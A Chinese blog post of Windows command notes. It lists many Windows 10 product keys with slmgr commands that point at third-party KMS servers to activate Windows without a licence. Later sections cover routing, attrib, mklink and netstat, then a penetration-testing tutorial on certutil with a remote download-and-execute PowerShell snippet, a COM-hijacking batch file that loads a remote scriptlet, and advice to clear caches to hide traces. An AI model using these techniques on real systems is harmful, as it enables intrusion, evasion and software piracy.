Windows 常用命令


用 slmgr 命令激活 win10

1.slmgr.vbs /upk     卸载产品密钥

2.slmgr /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99     安装产品密钥

3.slmgr /skms 132.232.70.97:1688     设置激活服务器

4.slmgr /ato     激活系统

win10 密钥须知:win10 激活码都有激活次数的限制,而且容易被官方封禁,所以不能保证 100%可用,win10 序列号不能用时,大家可以用激活工具来激活,市面上的激活工具都是 KMS 激活,KMS 是 180 天激活,到期后可反复激活进行续期,或下载安装。

win10 企业版 G kms 激活 400 年方法
Windows 10 Pro(win10 专业版激活密钥)

TPYNC-4J6KF-4B4GP-2HD89-7XMP6
2BXNW-6CGWX-9BXPV-YJ996-GMT6T
NRTT2-86GJM-T969G-8BCBH-BDWXG
XC88X-9N9QX-CDRVP-4XV22-RVV26
TNM78-FJKXR-P26YV-GP8MB-JK8XG
TR8NX-K7KPD-YTRW3-XTHKX-KQBP6

VK7JG-NPHTM-C97JM-9MPGT-3V66T
NPPR9-FWDCX-D2C8J-H872K-2YT43
W269N-WFGWX-YVC9B-4J6C9-T83GX
NYW94-47Q7H-7X9TT-W7TXD-JTYPM
NJ4MX-VQQ7Q-FP3DB-VDGHX-7XM87
MH37W-N47XK-V7XM9-C7227-GCQG9

windows10 Home(win10 家庭版激活码):

TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
3KHY7-WNT83-DGQKR-F7HPR-844BM
7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
PPBK3-M92CH-MRR9X-34Y9P-7CH2F
(OA 3.0 版)
Win10 家庭版 37GNV-YCQVD-38XP9-T848R-FC2HD
Win10 家庭版 N 33C4Y-NPKCC-V98JP-42G8W-VH636
(非 OA 3.0 版)
Win10 家庭版 46J3N-RY6B3-BJFDY-VBFT9-V22HG
Win10 家庭版 N PGGM7-N77TC-KVR98-D82KJ-DGPHV

Windows 10 系统
企业版:XGVPP-NMH47-7TTHJ-W3FW7-8HV2C
教育版:YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
专业版 N:2B87N-8KFHP-DKV6R-Y2C8J-PKCKT
企业版 N:WGGHN-J84D6-QYCPR-T7PJ7-X766F
教育版 N:84NGF-MHBT6-FXBX8-QWJK7-DRR8H
企业版 S:FWN7H-PF93Q-4GGP8-M8RF3-MDWWW
单语言版:BT79Q-G7N6G-PGBYW-4YWX6-6F4BT

Windows 10 Core Single Language:JPYNJ-XTFCR-372YJ-YJJ4Q-G83YB
Windows 10 Core 中文版 Language Edition:R3BYW-CBNWT-F3JTP-FM942-BTDXY
Windows 10 Core :KTNPV-KTRK4-3RRR8-39X6W-W44T3
Windows 10 Pro:8N67H-M3CY9-QT7C4-2TR7M-TXYCV
Windows 10 Enterprise:CKFK9-QNGF2-D34FM-99QX3-8XC4K
Windows 10 Core Single Language :JPYNH-XTFCR-372YJ-YJJ3Q-G83YB
Windows 10 Core Chinese Languange Edition:R3BYW-CBNWT-F3JTP-FM942-BTDXY

win10 企业版:
Windows 10 Enterprise : NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Enterprise N: DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Enterprise 2015 LTSB :WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2015 LTSB N : 2F77B-TNFGY-69QQF-B8YKP-D69TJ

win10 预览版密钥:

Win10 企业版密钥:PBHCJ-Q2NYD-2PX34-T2TD6-233PK

Win10 专业版密钥:NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

激活方法:
系统安装完毕后,首先以管理员身份打开 CMD 命令行窗口,按下 Win+X,选择命令提示符(管理员)。
说明:kms.xspace.in 是 kms 服务器地址,可能会失效,如果激活失败,可以自行搜索 kms 服务器地址,将 kms.xspace.in 替换成新的地址即可,比如换成 kms.03k.org,参考可用的 kms 激活服务器有哪些
win10 专业版用户请依次输入:
slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
slmgr /skms kms.03k.org
slmgr /ato

win10 企业版用户请依次输入:
slmgr /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43
slmgr /skms kms.03k.org
slmgr /ato

win10 家庭版用户依次输入:
slmgr /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
slmgr /skms kms.03k.org
slmgr /ato

路由相关

::route add 目标地址 mask 子网掩码 -p 下一跳
::例如:
route add 192.168.2.0 mask 255.255.255.0 -p 192.168.7.3
::删除的话只需要把 add 改为 delete 即可。

route print ::查看当前的路由表
tracert 192.168.7.1(目标地址) ::跟踪地址(从当前地址到达指定地址经过的路由)

1.attrib 修改文件属性

有些文件夹想隐藏起来,并不想加密。可用以下方法进行:将把普通文件夹改成受保护的操作系统文件
在命令提示符状态下(开始-> 运行->cmd):
输入命令:”attrib /?”
就有中文操作提示。如下:
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename] [/S [
/D]]

  • 设置属性。

  • 清除属性。
    R 只读文件属性。
    A 存档文件属性。
    S 系统文件属性。
    H 隐藏文件属性。
    [drive:][path][filename]
    指定要处理的文件属性。
    /S 处理当前文件夹及其子文件夹中的匹配文件。
    /D 也处理文件夹。

举例:
将 d 盘的 “电影” 文件夹 加系统属性和隐属性 (即受保护的操作系统文件)
C:>attrib +h +s d:\ 电影

相反取消则是
C:>attrib -h -s d:\ 电影

命令区别:
/d 给目录创建符号链接,简称符号链接、软链接;
/h 创建硬链接,简称硬链接;
/j 给目录创建联接点,简称软链接。

当没有上面 3 个命令符时,创建是文件软链接!文件类型:.symlink
注意:
路径,建议使用绝对路径,必须使用英文双引号将路径括起来;
空格,命令之间必须有空格

例子:

mklink /J 连接到的路径 原路径
mklink /j test C:\Users\Serenity\Test

3.netstat 查找占用指定端口的进程 pid

#ano 为参数,表示  以数字形式显示所有连接和侦听的地址和端口号,并显示显示拥有的与每个连接关联的进程 ID
#a 显示所有连接和侦听端口。
#n 以数字形式显示地址和端口号。
#o 显示拥有的与每个连接关联的进程 ID。
#findstr 为字符串过滤(搜索结果中带有指定字符的记录,类似于linux中的grep)
netstat -ano |findstr 8569

CertUtil 渗透工具

CertUtil

1.帮助文档

动词:
-dump             – 转储配置信息或文件
-dumpPFX          – 转储 PFX 结构
-asn              – 分析 ASN.1 文件

-decodehex        – 解码十六进制编码的文件
-decode           – 解码 Base64 编码的文件
-encode           – 将文件编码为 Base64

-deny             – 拒绝挂起的申请
-resubmit         – 重新提交挂起的申请
-setattributes    – 为挂起申请设置属性
-setextension     – 为挂起申请设置扩展
-revoke           – 吊销证书
-isvalid          – 显示当前证书部署

-getconfig        – 获取默认配置字符串
-ping             – Ping Active Directory 证书服务申请接口
-pingadmin        – Ping Active Directory 证书服务管理接口
-CAInfo           – 显示 CA 信息
-ca.cert          – 检索 CA 的证书
-ca.chain         – 检索 CA 的证书链
-GetCRL           – 获取 CRL
-CRL              – 发布新的 CRL [或仅增量 CRL]
-shutdown         – 关闭 Active Directory 证书服务

-installCert      – 安装证书颁发机构证书
-renewCert        – 续订证书颁发机构证书

-schema           – 转储证书架构
-view             – 转储证书视图
-db               – 转储原始数据库
-deleterow        – 删除服务器数据库行

-backup           – 备份 Active Directory 证书服务
-backupDB         – 备份 Active Directory 证书服务数据库
-backupKey        – 备份 Active Directory 证书服务证书和私钥
-restore          – 还原 Active Directory 证书服务
-restoreDB        – 还原 Active Directory 证书服务数据库
-restoreKey       – 还原 Active Directory 证书服务证书和私钥
-importPFX        – 导入证书和私钥
-dynamicfilelist  – 显示动态文件列表
-databaselocations – 显示数据库位置
-hashfile         – 通过文件生成并显示加密哈希

-store            – 转储证书存储
-enumstore        – 枚举证书存储
-addstore         – 将证书添加到存储
-delstore         – 从存储删除证书
-verifystore      – 验证存储中的证书
-repairstore      – 修复密钥关联,或者更新证书属性或密钥安全描述符
-viewstore        – 转储证书存储
-viewdelstore     – 从存储删除证书
-UI               – 调用 CryptUI
-attest           – 验证密钥证明请求

-dsPublish        – 将证书或 CRL 发布到 Active Directory

-ADTemplate       – 显示 AD 模板
-Template         – 显示注册策略模板
-TemplateCAs      – 显示模板的 CA
-CATemplates      – 显示 CA 的模板
-SetCASites       – 管理 CA 的站点名称
-enrollmentServerURL – 显示、添加或删除与 CA 关联的注册服务器 URL
-ADCA             – 显示 AD CA
-CA               – 显示注册策略 CA
-Policy           – 显示注册策略
-PolicyCache      – 显示或删除注册策略缓存项目
-CredStore        – 显示、添加或删除凭据存储项目
-InstallDefaultTemplates – 安装默认的证书模板
-URLCache         – 显示或删除 URL 缓存项目
-pulse            – 以脉冲方式执行自动注册事件或 NGC 任务
-MachineInfo      – 显示 Active Directory 计算机对象信息
-DCInfo           – 显示域控制器信息
-EntInfo          – 显示企业信息
-TCAInfo          – 显示 CA 信息
-SCInfo           – 显示智能卡信息

-SCRoots          – 管理智能卡根证书

-verifykeys       – 验证公/私钥集
-verify           – 验证证书,CRL 或链
-verifyCTL        – 验证 AuthRoot 或不允许的证书 CTL
-syncWithWU       – 与 Windows 更新同步
-generateSSTFromWU – 通过 Windows 更新生成 SST
-generatePinRulesCTL – 生成捆绑规则 CTL
-downloadOcsp     – 下载 OCSP 响应并写入目录
-generateHpkpHeader – 使用指定文件或目录中的证书生成 HPKP 头
-flushCache       – 刷新选定进程(例如 lsass.exe)中的指定缓存
-addEccCurve      – 添加 ECC 曲线
-deleteEccCurve   – 删除 ECC 曲线
-displayEccCurve  – 显示 ECC 曲线
-sign             – 重新签名 CRL 或证书

-vroot            – 创建/删除 Web 虚拟根和文件共享
-vocsproot        – 创建/删除 OCSP Web Proxy 的 Web 虚拟根
-addEnrollmentServer – 添加注册服务器应用程序
-deleteEnrollmentServer – 删除注册服务器应用程序
-addPolicyServer  – 添加策略服务器应用程序
-deletePolicyServer – 删除策略服务器应用程序
-oid              – 显示 ObjectId 或设置显示名称
-error            – 显示错误代码消息文本
-getreg           – 显示注册表值
-setreg           – 设置注册表值
-delreg           – 删除注册表值

-ImportKMS        – 为密钥存档导入用户密钥和证书到服务器数据库
-ImportCert       – 将证书文件导入数据库
-GetKey           – 检索存档的私钥恢复 Blob,生成恢复脚本 或恢复存档的密钥
-RecoverKey       – 恢复存档的私钥
-MergePFX         – 合并 PFX 文件
-ConvertEPF       – 将 PFX 文件转换为 EPF 文件

-add-chain        – (-AddChain) 添加证书链
-add-pre-chain    – (-AddPrechain) 添加预植证书链
-get-sth          – (-GetSTH) 获取签名树头
-get-sth-consistency – (-GetSTHConsistency) 获取签名树头更改
-get-proof-by-hash – (-GetProofByHash) 获取哈希证明
-get-entries      – (-GetEntries) 获取项
-get-roots        – (-GetRoots) 获取根
-get-entry-and-proof – (-GetEntryAndProof) 获取项和证明
-VerifyCT         – 验证证书 SCT
-?                – 显示该用法消息

CertUtil -?              – 显示动词列表(命名列表)
CertUtil -dump -?        – 显示 “dump” 动词的帮助文本
CertUtil -v -?           – 显示所有动词的所有帮助文本

2.使用案例

certutil 简介

用于备份证书服务管理,支持 xp-win10

更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

渗透测试中的应用

1、downloader

(1) 保存在当前路径,文件名称和下载文件名称相同

certutil  -urlcache  -split  -f  https://github.com/backlion/demo/blob/master/weblogic.py

20190428102711915_2912.png
(2) 保存在当前路径,指定保存文件名称

certutil  -urlcache  -split  -f   https://github.com/backlion/demo/blob/master/weblogic.py  test.py

20190428102735667_6681.png
(3) 保存在缓存目录,名称随机
缓存目录位置:  %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py

20190428102839822_16446.png20190428102857223_3192.png

2、清除下载文件副本方法

(1) 方法一,直接删除缓存目录对应文件
如下图:
20190428102908757_6260.png
(2)方法二,命令行:

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py delete

20190428102923603_13046.png
(3) 补充:
查看缓存项目:

certutil.exe -urlcache *

如下图
20190428102935629_14020.png

3、实际测试

(1) powershell 中的利用
测试系统安装 Office 软件,下载执行 dll 对应的 powershell 代码如下:

$path="D:\test\msg1.dll"
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll  $path
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($path)

测试如下图
20190428103020940_17740.png
(2) 下载劫持 com 的 sct 的批处理文件
test.bat(这里批处理是利用到 certutil 下载 sct 文件劫持 com 弹出计算器):

@echo off
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /ve /t REG_SZ /d C:\WINDOWS\system32\scrobj.dll /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /v ThreadingModel  /t REG_SZ /d Apartment /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
certutil 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /f 1>nul 2>&1
echo Done!

这里测试的 test.scr:
20190428103049715_20490.png
注意:在实战中需要替换该批处理文件中地址:
https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct为你自己需要的 sct(劫持 com)文件

运行批处理如下:
20190428103147720_16446.png

4、计算文件 hash

(1) SHA1

certutil  -hashfile msg1.dll

20190428103200430_25610.png

(2) SHA256:

certutil  -hashfile msg1.dll SHA256

20190428103215284_27232.png

(3) MD5:

certutil  -hashfile msg1.dll MD5

20190428103230984_21852.png

5、base64 编码转换
(1) base64 编码:

CertUtil -encode InFile OutFile

20190428103313797_24796.png
(2) base64 解码

CertUtil -decode InFile OutFile

20190428103325621_17842.png
注:
编码后的文件会添加两处标识信息:
文件头:
—–BEGIN CERTIFICATE—–
文件尾:
—–END CERTIFICATE—–
如下图
20190428103358130_31519.png

downloader 常用方法

常用的 cmd 下 downloader 方法,相比来说,利用 certUtil 简便快捷,但是使用后需要注意清除缓存,路径如下:
%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

downloader 常用方法如下:
· certUtil
· powershell
· csc
· vbs
· JScript
· hta
· bitsadmin
· wget
· debug
· ftp
· ftfp

小结

本文介绍了 certutil 在渗透测试中的应用,详细介绍利用 certutil 作 downloader 的实现方法和检测方法
更多学习请看https://3gstudent.github.io/本文的出处


文章作者: 慕书
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 慕书 !
评论
  目录